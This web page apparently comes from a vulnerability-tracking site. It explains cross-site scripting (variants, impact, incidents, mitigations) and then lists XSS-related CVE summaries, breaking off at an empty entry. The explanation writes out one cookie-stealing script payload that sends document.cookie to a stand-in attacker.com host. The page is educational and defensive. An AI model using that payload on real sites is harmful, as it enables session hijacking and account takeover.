Cross-Site Scripting

web MEDIUM

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding.

How It Works

Cross-Site Scripting occurs when an application accepts untrusted data and sends it to a web browser without proper validation or encoding. The attacker crafts input containing JavaScript code, which the application then incorporates into its HTML response. When a victim's browser renders this response, it executes the injected script as if it were legitimate code from the trusted website.

The attack manifests in three main variants. Reflected XSS occurs when malicious script arrives via an HTTP parameter (like a search query) and immediately bounces back in the response—typically delivered through phishing links. Stored XSS is more dangerous: the payload persists in the application's database (in comment fields, user profiles, forum posts) and executes whenever anyone views the infected content. DOM-based XSS happens entirely client-side when JavaScript code improperly handles user-controllable data, modifying the DOM in unsafe ways without ever sending the payload to the server.

A typical attack flow starts with the attacker identifying an injection point—anywhere user input appears in HTML output. They craft a payload like <script>document.location='http://attacker.com/steal?c='+document.cookie</script> and inject it through the vulnerable parameter. When victims access the page, their browsers execute this script within the security context of the legitimate domain, giving the attacker full access to cookies, session tokens, and DOM content.

Impact

  • Session hijacking: Steal authentication cookies to impersonate victims and access their accounts
  • Credential harvesting: Inject fake login forms on trusted pages to capture usernames and passwords
  • Account takeover: Perform state-changing actions (password changes, fund transfers) as the authenticated victim
  • Keylogging: Monitor and exfiltrate everything users type on the compromised page
  • Phishing and malware distribution: Redirect users to malicious sites or deliver drive-by downloads from a trusted domain
  • Data exfiltration: Access and steal sensitive information visible in the DOM or retrieved via AJAX requests

Real-World Examples

A stored XSS vulnerability in Twitter (2010) allowed attackers to create self-propagating worms. Users hovering over malicious tweets automatically retweeted them and followed the attacker, creating viral spread through the platform's legitimate functionality.

eBay suffered from persistent XSS flaws in product listings (CVE-2015-2880) where attackers embedded malicious scripts in item descriptions. Buyers viewing these listings had their sessions compromised, enabling unauthorized purchases and account takeover.

British Airways faced a sophisticated supply chain attack (2018) where attackers injected JavaScript into the airline's payment page. The script skimmed credit card details from 380,000 transactions, demonstrating how XSS enables payment fraud at massive scale.

Mitigation

  • Context-aware output encoding: HTML-encode for HTML context, JavaScript-encode for JS strings, URL-encode for URLs—never use generic escaping
  • Content Security Policy (CSP): Deploy strict CSP headers to whitelist script sources and block inline JavaScript execution
  • HTTPOnly and Secure cookie flags: Prevent JavaScript access to session cookies and ensure transmission over HTTPS only
  • Input validation: Reject unexpected characters and patterns, though this is defense-in-depth, not primary protection
  • DOM-based XSS prevention: Use safe APIs like textContent instead of innerHTML; avoid passing user data to dangerous sinks like eval()

Recent CVEs (10174)

CVE-2025-2477
EPSS 0% CVSS 4.7
MEDIUM This Month

The CryoKey plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘ckemail’ parameter in all versions up to, and including, 2.4 due to insufficient input sanitization and. Rated medium severity (CVSS 4.7), this vulnerability is remotely exploitable, no authentication required. No vendor patch available.

PHP WordPress XSS
NVD
CVE-2024-13739
EPSS 0% CVSS 6.1
MEDIUM This Month

The Newsletters plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the "to" parameter in all versions up to, and including, 4.9.9.7 due to insufficient input sanitization and. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

WordPress XSS Newsletters
NVD
CVE-2025-2610
EPSS 2% CVSS 7.6
HIGH POC PATCH This Week

Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling (Alarm Module modules) allows authenticated stored cross-site scripting. Rated high severity (CVSS 7.6), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

PHP XSS Magnusbilling
NVD GitHub
CVE-2025-2609
EPSS 6% CVSS 8.2
HIGH POC PATCH This Week

Improper neutralization of input during web page generation vulnerability in MagnusSolution MagnusBilling login logging allows unauthenticated users to store HTML content in the viewable log. Rated high severity (CVSS 8.2), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

PHP XSS Magnusbilling
NVD GitHub
CVE-2025-25035
EPSS 0% CVSS 7.3
HIGH This Month

Improper Neutralization of Input During Web Page Generation Cross-site Scripting vulnerability in Jalios JPlatform 10 allows for Reflected XSS and Stored XSS.0.8 (SP8), before 10.0.7 (SP7), before. Rated high severity (CVSS 7.3), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS
NVD
CVE-2025-30349
EPSS 19% CVSS 7.2
HIGH Act Now

Horde IMP through 6.2.27, as used with Horde Application Framework through 5.2.23, allows XSS that leads to account takeover via a crafted text/html e-mail message with an onerror attribute (that may. Rated high severity (CVSS 7.2), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Epss exploitation probability 18.6% and no vendor patch available.

XSS
NVD GitHub
CVE-2025-2590
EPSS 0% CVSS 4.8
MEDIUM POC This Month

A vulnerability was found in code-projects Human Resource Management System 1.0.1. Rated medium severity (CVSS 4.8), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Human Resource Management
NVD GitHub VulDB
CVE-2025-2597
EPSS 0% CVSS 5.1
MEDIUM This Month

Reflected Cross-Site Scripting (XSS) in ITIUM 6050 version 5.5.5.2-b3526 from Impact Technologies. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

PHP XSS Itium 6050 Firmware
NVD
CVE-2025-2583
EPSS 0% CVSS 5.1
MEDIUM POC This Month

A vulnerability was found in SimpleMachines SMF 2.1.4. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS Simple Machines Forum
NVD GitHub VulDB
CVE-2025-2582
EPSS 0% CVSS 5.1
MEDIUM POC This Month

A vulnerability was found in SimpleMachines SMF 2.1.4 and classified as problematic. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS Simple Machines Forum
NVD GitHub VulDB
CVE-2025-30342
EPSS 0% CVSS 5.4
MEDIUM POC This Month

An XSS issue was discovered in OpenSlides before 4.2.5. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Openslides
NVD
CVE-2024-50053
EPSS 0% CVSS 6.3
MEDIUM This Month

Zohocorp ManageEngine ServiceDesk Plus versions below 14920 , ServiceDesk Plus MSP and SupportCentre Plus versions below 14910 are vulnerable to Stored XSS in the task feature. Rated medium severity (CVSS 6.3), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS Manageengine Servicedesk Plus Manageengine Servicedesk Plus Msp +1
NVD
CVE-2024-48591
EPSS 0% CVSS 6.1
MEDIUM This Month

Inflectra SpiraTeam 7.2.00 is vulnerable to Cross Site Scripting (XSS). Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

XSS Spirateam
NVD GitHub
CVE-2025-29412
EPSS 0% CVSS 4.8
MEDIUM POC Monitor

A cross-site scripting (XSS) vulnerability in the Client Profile Update section of Mart Developers iBanking v2.0.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted. Rated medium severity (CVSS 4.8), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Ibanking
NVD GitHub
CVE-2025-29410
EPSS 0% CVSS 6.1
MEDIUM POC This Month

A cross-site scripting (XSS) vulnerability in the component /contact.php of Hospital Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS Hospital Management System
NVD GitHub
CVE-2025-27888 Maven
EPSS 1% CVSS 5.8
MEDIUM PATCH This Month

Severity: medium (5.8) / important Server-Side Request Forgery (SSRF), Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), URL Redirection to Untrusted Site ('Open. Rated medium severity (CVSS 5.8), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS Apache SSRF +2
NVD
CVE-2025-1802
EPSS 0% CVSS 6.4
MEDIUM PATCH This Month

The HT Mega - Absolute Addons For Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘marker_title’, 'notification_content', and 'stt_button_text' parameters in all. Rated medium severity (CVSS 6.4), this vulnerability is remotely exploitable, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

PHP WordPress XSS +1
NVD
CVE-2025-0281
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

A stored cross-site scripting (XSS) vulnerability exists in lunary-ai/lunary versions 1.6.7 and earlier. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

XSS Lunary
NVD GitHub
CVE-2025-0192
EPSS 0% CVSS 5.4
MEDIUM This Month

A stored Cross-site Scripting (XSS) vulnerability exists in the latest version of wandb/openui. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS
NVD
CVE-2025-0183
EPSS 0% CVSS 5.4
MEDIUM POC This Month

A stored cross-site scripting (XSS) vulnerability exists in the Latex Proof-Reading Module of binary-husky/gpt_academic version 3.9.0. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Gpt Academic
NVD
CVE-2024-9900 Go
EPSS 0% CVSS 6.1
MEDIUM POC PATCH This Month

mudler/localai version v2.21.1 contains a Cross-Site Scripting (XSS) vulnerability in its search functionality. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

XSS Suse Localai
NVD GitHub
CVE-2024-9699
EPSS 0% CVSS 5.4
MEDIUM PATCH This Month

A vulnerability in the file upload functionality of the FlatPress CMS admin panel (version latest) allows an attacker to upload a file with a JavaScript payload disguised as a filename. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

XSS File Upload Flatpress
NVD GitHub
CVE-2024-9107
EPSS 0% CVSS 5.4
MEDIUM POC This Month

A stored cross-site scripting (XSS) vulnerability exists in the gaizhenbiao/chuanhuchatgpt repository, affecting version git 20b2e02. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Chuanhuchatgpt
NVD
CVE-2024-8556 PyPI
EPSS 0% CVSS 6.1
MEDIUM POC This Month

A stored cross-site scripting (XSS) vulnerability exists in modelscope/agentscope, as of the latest commit 21161fe on the main branch. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS Agentscope
NVD
CVE-2024-8400
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

A stored cross-site scripting (XSS) vulnerability exists in the latest version of gaizhenbiao/chuanhuchatgpt. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

XSS Chuanhuchatgpt
NVD GitHub
CVE-2024-8101
EPSS 0% CVSS 6.1
MEDIUM POC This Month

A stored cross-site scripting (XSS) vulnerability exists in the Text Explorer component of aimhubio/aim version 3.23.0. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS Aim
NVD
CVE-2024-8029
EPSS 0% CVSS 6.1
MEDIUM POC This Month

An XSS vulnerability was discovered in the upload file(s) process of imartinez/privategpt v0.5.0. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS Privategpt
NVD
CVE-2024-8027
EPSS 0% CVSS 6.1
MEDIUM POC This Month

A stored Cross-Site Scripting (XSS) vulnerability exists in netease-youdao/QAnything. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS Qanything
NVD
CVE-2024-8017
EPSS 0% CVSS 9.0
CRITICAL POC Act Now

An XSS vulnerability exists in open-webui/open-webui versions <= 0.3.8, specifically in the function that constructs the HTML for tooltips. Rated critical severity (CVSS 9.0), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Open Webui
NVD
CVE-2024-7990 PyPI
EPSS 0% CVSS 8.4
HIGH POC This Week

A stored cross-site scripting (XSS) vulnerability exists in open-webui/open-webui version 0.3.8. Rated high severity (CVSS 8.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS RCE Open Webui
NVD
CVE-2024-7053 PyPI
EPSS 0% CVSS 9.0
CRITICAL POC Act Now

A vulnerability in open-webui/open-webui version 0.3.8 allows an attacker with a user-level account to perform a session fixation attack. Rated critical severity (CVSS 9.0), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS RCE Open Webui
NVD
CVE-2024-7044 PyPI
EPSS 0% CVSS 8.9
HIGH POC This Week

A Stored Cross-Site Scripting (XSS) vulnerability exists in the chat file upload functionality of open-webui/open-webui version 0.3.8. Rated high severity (CVSS 8.9), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS File Upload Open Webui
NVD
CVE-2024-6986
EPSS 0% CVSS 5.4
MEDIUM POC This Month

A Cross-site Scripting (XSS) vulnerability exists in the Settings page of parisneo/lollms-webui version 9.8. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Lollms Web Ui
NVD
CVE-2024-6827 PyPI
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Gunicorn version 21.2.0 does not properly validate the value of the 'Transfer-Encoding' header as specified in the RFC standards, which leads to the default fallback method of 'Content-Length,'. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

XSS Information Disclosure SSRF +3
NVD
CVE-2024-4023
EPSS 0% CVSS 8.1
HIGH POC PATCH This Week

A stored cross-site scripting (XSS) vulnerability exists in flatpressblog/flatpress version 1.3. Rated high severity (CVSS 8.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

XSS Flatpress
NVD GitHub
CVE-2024-12871
EPSS 0% CVSS 5.4
MEDIUM POC This Month

An XSS vulnerability in infiniflow/ragflow version 0.12.0 allows an attacker to upload a malicious PDF file to the knowledge base. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Ragflow
NVD
CVE-2024-12870
EPSS 0% CVSS 5.4
MEDIUM This Month

A stored cross-site scripting (XSS) vulnerability exists in infiniflow/ragflow, affecting the latest commit on the main branch (cec2080). Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS Authentication Bypass
NVD
CVE-2024-12374
EPSS 0% CVSS 6.1
MEDIUM POC This Month

A stored cross-site scripting (XSS) vulnerability exists in automatic1111/stable-diffusion-webui version git 82a973c. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS Stable Diffusion Webui
NVD
CVE-2024-11850
EPSS 0% CVSS 5.4
MEDIUM POC This Month

A stored cross-site scripting (XSS) vulnerability exists in the latest version of langgenius/dify. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Dify
NVD
CVE-2024-11824
EPSS 0% CVSS 7.6
HIGH POC PATCH This Week

A stored cross-site scripting (XSS) vulnerability exists in langgenius/dify version latest, specifically in the chat log functionality. Rated high severity (CVSS 7.6), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

XSS Dify
NVD GitHub
CVE-2024-11441
EPSS 0% CVSS 6.1
MEDIUM This Month

A stored cross-site scripting (XSS) vulnerability exists in Serge version 0.9.0. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

XSS
NVD
CVE-2024-10819
EPSS 0% CVSS 8.8
HIGH POC This Week

A Cross-Site Request Forgery (CSRF) vulnerability in version 3.83 of binary-husky/gpt_academic allows an attacker to trick a user into uploading files without their consent, exploiting their session. Rated high severity (CVSS 8.8), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS CSRF Gpt Academic
NVD
CVE-2024-10727
EPSS 0% CVSS 6.1
MEDIUM POC PATCH This Month

A reflected cross-site scripting (XSS) vulnerability exists in phpipam/phpipam versions 1.5.0 through 1.6.0. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

XSS Phpipam
NVD GitHub
CVE-2024-10725
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

A stored cross-site scripting (XSS) vulnerability exists in phpipam/phpipam version 1.5.2. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

XSS Phpipam
NVD GitHub
CVE-2024-10724
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

A stored cross-site scripting (XSS) vulnerability exists in phpipam/phpipam version 1.5.2, specifically in the Subnet NAT translations section when editing the Destination address. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

XSS Phpipam
NVD GitHub
CVE-2024-10723
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

A stored cross-site scripting (XSS) vulnerability was discovered in phpipam/phpipam version 1.5.2. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

XSS Authentication Bypass Phpipam
NVD GitHub
CVE-2024-10722
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

A stored cross-site scripting (XSS) vulnerability exists in phpipam/phpipam version 1.5.2. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

XSS Phpipam
NVD GitHub
CVE-2024-10721
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

A stored cross-site scripting (XSS) vulnerability was discovered in phpipam/phpipam version 1.5.2. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

XSS Authentication Bypass Phpipam
NVD GitHub
CVE-2024-10720
EPSS 0% CVSS 6.1
MEDIUM POC PATCH This Month

A stored cross-site scripting (XSS) vulnerability exists in phpipam/phpipam version 1.5.2. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available.

XSS Phpipam
NVD GitHub
CVE-2024-10719
EPSS 0% CVSS 5.4
MEDIUM POC PATCH This Month

A stored cross-site scripting (XSS) vulnerability exists in phpipam version 1.5.2, specifically in the circuits options functionality. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

PHP XSS Phpipam
NVD GitHub
CVE-2024-10481
EPSS 0% CVSS 6.5
MEDIUM POC This Week

A CSRF vulnerability exists in comfyanonymous/comfyui versions up to v0.2.2. Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS CSRF Comfyui
NVD
CVE-2024-0640
EPSS 0% CVSS 4.8
MEDIUM POC PATCH This Month

A stored cross-site scripting (XSS) vulnerability exists in chatwoot/chatwoot versions 3.0.0 to 3.5.1. Rated medium severity (CVSS 4.8), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available.

XSS Chatwoot
NVD GitHub
CVE-2025-2108
EPSS 0% CVSS 6.4
MEDIUM This Month

The 140+ Widgets | Xpro Addons For Elementor - FREE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the ‘Site Title’ widget's 'title_tag' and 'html_tag' parameters in all. Rated medium severity (CVSS 6.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

PHP WordPress XSS
NVD
CVE-2024-13881
EPSS 0% CVSS 7.1
HIGH POC This Week

The Link My Posts WordPress plugin through 1.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

WordPress XSS Linkmyposts
NVD WPScan
CVE-2024-13880
EPSS 0% CVSS 7.1
HIGH POC This Week

The My Quota WordPress plugin through 1.0.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

WordPress XSS My Quota
NVD WPScan
CVE-2024-13878
EPSS 0% CVSS 7.1
HIGH POC This Week

The SpotBot WordPress plugin through 0.1.8 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

WordPress XSS Spotbot
NVD WPScan
CVE-2024-13877
EPSS 0% CVSS 7.1
HIGH POC This Week

The Passbeemedia Web Push Notification WordPress plugin through 1.0.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

WordPress XSS Passbeemedia Web Push Notification
NVD WPScan
CVE-2024-13876
EPSS 0% CVSS 7.1
HIGH POC This Week

The mEintopf WordPress plugin through 0.2.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

WordPress XSS Meintopf
NVD WPScan
CVE-2024-13875
EPSS 0% CVSS 7.1
HIGH POC This Month

The WP-PManager WordPress plugin through 1.2 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

WordPress XSS Wp Pmanager
NVD WPScan
CVE-2025-30092
EPSS 0% CVSS 6.1
MEDIUM This Month

Intrexx Portal Server 12.x <= 12.0.2 and 11.x <= 11.9.2 allows XSS in multiple Velocity scripts. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

XSS
NVD
CVE-2024-55009
EPSS 0% CVSS 6.1
MEDIUM POC This Month

A reflected cross-site scripting (XSS) vulnerability in AutoBib - Bibliographic collection management system 3.1.140 and earlier allows attackers to execute arbitrary Javascript in the context of a. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

XSS Autobib
NVD
CVE-2025-27705
EPSS 0% CVSS 5.5
MEDIUM This Month

There is a cross-site scripting vulnerability in the Secure Access administrative console of Absolute Secure Access prior to version 13.53. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable, no authentication required. No vendor patch available.

XSS
NVD
CVE-2025-2536 Maven
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Cross-site scripting (XSS) vulnerability on Liferay Portal 7.4.3.82 through 7.4.3.128, and Liferay DXP 2024.Q3.0, 2024.Q2.0 through 2024.Q2.13, 2024.Q1.1 through 2024.Q1.12, 2023.Q4.0 through. Rated medium severity (CVSS 5.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

XSS Digital Experience Platform Liferay Portal
NVD
CVE-2025-27704
EPSS 0% CVSS 5.5
MEDIUM This Month

There is a cross-site scripting vulnerability in the Secure Access administrative console of Absolute Secure Access prior to version 13.53. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable, no authentication required. No vendor patch available.

XSS
NVD
CVE-2024-53970
EPSS 0% CVSS 5.4
MEDIUM This Month

Adobe Experience Manager versions 6.5.21 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low privileged attacker to inject malicious scripts. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS Adobe Experience Manager
NVD
CVE-2024-53969
EPSS 0% CVSS 5.4
MEDIUM This Month

Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited to execute arbitrary code in the context of the. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS RCE Adobe +1
NVD
CVE-2024-53968
EPSS 0% CVSS 5.4
MEDIUM This Month

Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited to execute arbitrary code in the context of the. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS RCE Adobe +1
NVD
CVE-2024-53967
EPSS 0% CVSS 5.4
MEDIUM This Month

Adobe Experience Manager versions 6.5.21 and earlier are affected by a DOM-based Cross-Site Scripting (XSS) vulnerability that could be exploited to execute arbitrary code in the context of the. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS RCE Adobe +1
NVD
CVE-2025-30196 Maven
EPSS 0% CVSS 6.5
MEDIUM This Month

Jenkins AnchorChain Plugin 1.0 does not limit URL schemes for links it creates based on workspace content, allowing the `javascript:` scheme, resulting in a stored cross-site scripting (XSS). Rated medium severity (CVSS 6.5), this vulnerability is remotely exploitable, low attack complexity. No vendor patch available.

XSS Jenkins Anchorchain
NVD
CVE-2025-1232
EPSS 53% CVSS 8.8
HIGH POC THREAT This Week

The Site Reviews WordPress plugin before version 7.2.5 contains a stored XSS vulnerability via review fields. Unauthenticated users can inject malicious scripts through review submissions that execute when administrators view the reviews in the dashboard, enabling admin session hijacking.

PHP WordPress XSS +1
NVD WPScan
CVE-2025-29790 PHP
EPSS 0% CVSS 4.8
MEDIUM PATCH Monitor

Contao is an Open Source CMS. Rated medium severity (CVSS 4.8), this vulnerability is remotely exploitable, low attack complexity. This Cross-Site Scripting (XSS) vulnerability could allow attackers to inject malicious scripts into web pages viewed by other users.

XSS Contao
NVD GitHub
CVE-2025-2491
EPSS 0% CVSS 4.8
MEDIUM POC This Month

A vulnerability classified as problematic has been found in Dromara ujcms 9.7.5. Rated medium severity (CVSS 4.8), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Java Ujcms
NVD GitHub VulDB
CVE-2025-2490
EPSS 0% CVSS 4.8
MEDIUM POC This Month

A vulnerability was found in Dromara ujcms 9.7.5. Rated medium severity (CVSS 4.8), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

XSS Java File Upload +1
NVD GitHub VulDB
CVE-2025-2495
EPSS 0% CVSS 5.3
MEDIUM This Month

Stored Cross-Site Scripting (XSS) in Softdial Contact Center of Sytel Ltd. Rated medium severity (CVSS 5.3), this vulnerability is remotely exploitable, no authentication required, low attack complexity. No vendor patch available.

PHP XSS Softdial Contact Center
NVD
CVE-2025-29426
EPSS 0% CVSS 4.6
MEDIUM POC This Month

Code-projects Online Class and Exam Scheduling System V1.0 is vulnerable to Cross Site Scripting (XSS) in /pages/class.php via the id and cys parameters. Rated medium severity (CVSS 4.6), this vulnerability is low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS Online Class And Exam Scheduling System
NVD GitHub
CVE-2025-29427
EPSS 0% CVSS 5.9
MEDIUM POC This Month

Code-projects Online Class and Exam Scheduling System V1.0 is vulnerable to Cross Site Scripting (XSS) in profile.php via the member_first and member_last parameters. Rated medium severity (CVSS 5.9), this vulnerability is remotely exploitable. Public exploit code available and no vendor patch available.

PHP XSS Online Class And Exam Scheduling System
NVD GitHub
CVE-2025-29430
EPSS 0% CVSS 4.1
MEDIUM POC This Month

Code-projects Online Class and Exam Scheduling System V1.0 is vulnerable to Cross Site Scripting (XSS) in /pages/room.php via the id and rome parameters. Rated medium severity (CVSS 4.1), this vulnerability is remotely exploitable, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS Online Class And Exam Scheduling System
NVD GitHub
CVE-2025-29429
EPSS 0% CVSS 6.1
MEDIUM POC This Month

Code-projects Online Class and Exam Scheduling System V1.0 is vulnerable to Cross Site Scripting (XSS) in /pages/program.php via the id, code, and name parameters. Rated medium severity (CVSS 6.1), this vulnerability is remotely exploitable, no authentication required, low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS Online Class And Exam Scheduling System
NVD GitHub
CVE-2025-29431
EPSS 0% CVSS 3.2
LOW POC Monitor

Code-projects Online Class and Exam Scheduling System V1.0 is vulnerable to Cross Site Scripting (XSS) in /pages/department.php via the id, code, and name parameters. Rated low severity (CVSS 3.2), this vulnerability is low attack complexity. Public exploit code available and no vendor patch available.

PHP XSS Online Class And Exam Scheduling System
NVD GitHub
CVE-2025-30143
EPSS 0% CVSS 5.4
MEDIUM This Month

Rule 3000216 (before version 2) in Akamai App & API Protector (with Akamai ASE) before 2024-12-10 does not properly consider JavaScript variable assignment to built-in functions and properties. Rated medium severity (CVSS 5.4), this vulnerability is remotely exploitable, no authentication required. No vendor patch available.

XSS
NVD GitHub
CVE-2025-26127
EPSS 0% CVSS 5.0
MEDIUM This Month

A stored cross-site scripting (XSS) vulnerability in the Send for Approval function of FileCloud v23.241.2 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. Rated medium severity (CVSS 5.0), this vulnerability is remotely exploitable. No vendor patch available.

XSS
NVD GitHub
CVE-2025-25612
EPSS 0% CVSS 7.1
HIGH This Week

FS Inc S3150-8T2F prior to version S3150-8T2F_2.2.0D_135103 is vulnerable to Cross Site Scripting (XSS) in the Time Range Configuration functionality of the administration interface. Rated high severity (CVSS 7.1), this vulnerability is remotely exploitable. No vendor patch available.

XSS
NVD GitHub
CVE-2025-27102
